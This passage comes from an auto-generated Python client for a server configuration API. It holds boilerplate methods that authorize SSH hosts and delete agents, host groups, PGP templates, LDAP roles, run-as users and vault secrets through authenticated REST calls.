        if self.api_client.client_side_validation and ('hostname_port_list' not in params or params['hostname_port_list'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `hostname_port_list` when calling `authorize_mft_ssh_cluster`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'cluster_name' in params:
            path_params['clusterName'] = params['cluster_name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'hostname_port_list' in params:
            body_params = params['hostname_port_list']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/ssh/cluster/{clusterName}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def authorize_mft_ssh_host(self, server, agent, hostname, **kwargs):  # noqa: E501
        """Authorize SSH Host  # noqa: E501

        Authorize SSH Host for SFTP account  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.authorize_mft_ssh_host(server, agent, hostname, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str hostname: Ssh Hostname (required)
        :param str port: Ssh port for the relevant host
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501 else: (data) = self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501 return data def authorize_mft_ssh_host_with_http_info(self, server, agent, hostname, **kwargs): # noqa: E501 """Authorize SSH Host # noqa: E501 Authorize SSH Host for SFTP account # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.authorize_mft_ssh_host_with_http_info(server, agent, hostname, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str hostname: Ssh Hostname (required) :param str port: Ssh port for the relevant host :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'hostname', 'port'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method authorize_mft_ssh_host" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_host`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_host`") # noqa: E501 # 
verify the required parameter 'hostname' is set if self.api_client.client_side_validation and ('hostname' not in params or params['hostname'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostname` when calling `authorize_mft_ssh_host`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'hostname' in params: path_params['hostname'] = params['hostname'] # noqa: E501 query_params = [] if 'port' in params: query_params.append(('port', params['port'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/ssh/host/{hostname}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def create_run_as_user(self, server, run_as_user_data, **kwargs): # noqa: E501 """Add a new Run-as user # noqa: E501 Add a new Run-as user to server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_run_as_user(server, run_as_user_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. 
(required) :param RunAsUserData run_as_user_data: Run as user data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.create_run_as_user_with_http_info(server, run_as_user_data, **kwargs) # noqa: E501 else: (data) = self.create_run_as_user_with_http_info(server, run_as_user_data, **kwargs) # noqa: E501 return data def create_run_as_user_with_http_info(self, server, run_as_user_data, **kwargs): # noqa: E501 """Add a new Run-as user # noqa: E501 Add a new Run-as user to server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_run_as_user_with_http_info(server, run_as_user_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param RunAsUserData run_as_user_data: Run as user data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'run_as_user_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `create_run_as_user`") # noqa: E501 # verify the required parameter 'run_as_user_data' is set if self.api_client.client_side_validation and ('run_as_user_data' not in params or params['run_as_user_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `run_as_user_data` when calling `create_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'run_as_user_data' in params: body_params = params['run_as_user_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def 
delete_agent(self, server, agent, **kwargs): # noqa: E501 """delete an agent from Server # noqa: E501 Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to delete. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def delete_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """delete an agent from Server # noqa: E501 Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to delete. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_authorization_role(self, role, **kwargs): # noqa: E501 
"""Delete Authorization Role # noqa: E501 Delete Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_authorization_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501 return data def delete_authorization_role_with_http_info(self, role, **kwargs): # noqa: E501 """Delete Authorization Role # noqa: E501 Delete Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_authorization_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_authorization_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `delete_authorization_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_host_from_group(self, server, hostgroup, host, **kwargs): # noqa: E501 """delete an agent from a hostgroup # noqa: E501 Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_from_group(server, hostgroup, host, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param str host: The agent to be deleted (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501 else: (data) = self.delete_host_from_group_with_http_info(server, hostgroup, host, **kwargs) # noqa: E501 return data def delete_host_from_group_with_http_info(self, server, hostgroup, host, **kwargs): # noqa: E501 """delete an agent from a hostgroup # noqa: E501 Delete an agent from the specified hostgroup. If the group is empty it will also be deleted. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_host_from_group_with_http_info(server, hostgroup, host, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param str host: The agent to be deleted (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'hostgroup', 'host'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_host_from_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_host_from_group`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_from_group`") # noqa: E501 # verify the required parameter 'host' is set if self.api_client.client_side_validation and ('host' not in params or params['host'] is None): # noqa: E501 raise ValueError("Missing the required parameter `host` when calling `delete_host_from_group`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 if 'host' in params: path_params['host'] = params['host'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}/agent/{host}', 'DELETE', path_params, query_params, header_params, body=body_params, 
            post_params=form_params,
            files=local_var_files,
            response_type='AgentsInGroupSuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_host_group(self, server, hostgroup, **kwargs):  # noqa: E501
        """delete host group  # noqa: E501

        delete host group  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_host_group(server, hostgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str hostgroup: The hostgroup name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return only the deserialized body; callers wanting the full HTTP
        # response use delete_host_group_with_http_info directly.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_host_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_host_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
            return data

    def delete_host_group_with_http_info(self, server, hostgroup, **kwargs):  # noqa: E501
        """delete host group  # noqa: E501

        delete host group  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_host_group_with_http_info(server, hostgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str hostgroup: The hostgroup name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'hostgroup']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # locals() snapshot of the explicit arguments plus `kwargs`;
        # recognized keyword arguments are merged in and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_host_group" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `delete_host_group`")  # noqa: E501
        # verify the required parameter 'hostgroup' is set
        if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_group`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'hostgroup' in params:
            path_params['hostgroup'] = params['hostgroup']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/hostgroup/{hostgroup}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_pgp_template(self, server, agent, template_name, **kwargs):  # noqa: E501
        """Delete PGP Template  # noqa: E501

        Delete PGP Template  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_pgp_template(server, agent, template_name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str template_name: The PGP Template Name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return only the deserialized body; callers wanting the full HTTP
        # response use delete_pgp_template_with_http_info directly.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs)  # noqa: E501
            return data

    def delete_pgp_template_with_http_info(self, server, agent, template_name, **kwargs):  # noqa: E501
        """Delete PGP Template  # noqa: E501

        Delete PGP Template  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_pgp_template_with_http_info(server, agent, template_name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str template_name: The PGP Template Name (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'template_name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # locals() snapshot of the explicit arguments plus `kwargs`;
        # recognized keyword arguments are merged in and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_pgp_template" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `delete_pgp_template`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `delete_pgp_template`")  # noqa: E501
        # verify the required parameter 'template_name' is set
        if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `template_name` when calling `delete_pgp_template`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'template_name' in params:
            path_params['templateName'] = params['template_name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_role_from_ldap_group(self, ldapgroup, role, **kwargs):  # noqa: E501
        """Delete a role from LDAP group  # noqa: E501

        Delete a role from LDAP group  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_role_from_ldap_group(ldapgroup, role, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str ldapgroup: Name of LDAP group (required)
        :param str role: Name of role (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return only the deserialized body; callers wanting the full HTTP
        # response use delete_role_from_ldap_group_with_http_info directly.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_role_from_ldap_group_with_http_info(ldapgroup, role, **kwargs)  # noqa: E501
            return data

    def delete_role_from_ldap_group_with_http_info(self, ldapgroup, role, **kwargs):  # noqa: E501
        """Delete a role from LDAP group  # noqa: E501

        Delete a role from LDAP group  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_role_from_ldap_group_with_http_info(ldapgroup, role, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str ldapgroup: Name of LDAP group (required)
        :param str role: Name of role (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['ldapgroup', 'role']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # locals() snapshot of the explicit arguments plus `kwargs`;
        # recognized keyword arguments are merged in and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_role_from_ldap_group" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'ldapgroup' is set
        if self.api_client.client_side_validation and ('ldapgroup' not in params or params['ldapgroup'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `ldapgroup` when calling `delete_role_from_ldap_group`")  # noqa: E501
        # verify the required parameter 'role' is set
        if self.api_client.client_side_validation and ('role' not in params or params['role'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `role` when calling `delete_role_from_ldap_group`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'ldapgroup' in params:
            path_params['ldapgroup'] = params['ldapgroup']  # noqa: E501
        if 'role' in params:
            path_params['role'] = params['role']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/authorization/ldap/{ldapgroup}/role/{role}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_run_as_user(self, server, agent, user, **kwargs): # noqa: E501 """delete Run-as user # noqa: E501 Delete Run-as user from server # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_run_as_user(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 else: (data) = self.delete_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 return data def delete_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501 """delete Run-as user # noqa: E501 Delete Run-as user from server # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_run_as_user_with_http_info(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `delete_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, 
response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_secret(self, name, **kwargs): # noqa: E501 """Delete an existing secret # noqa: E501 Delete an existing secret from the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_secret(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_secret_with_http_info(name, **kwargs) # noqa: E501 else: (data) = self.delete_secret_with_http_info(name, **kwargs) # noqa: E501 return data def delete_secret_with_http_info(self, name, **kwargs): # noqa: E501 """Delete an existing secret # noqa: E501 Delete an existing secret from the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_secret_with_http_info(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in params or params['name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name` when calling `delete_secret`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['name'] = params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secret/{name}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_user(self, user, **kwargs): # 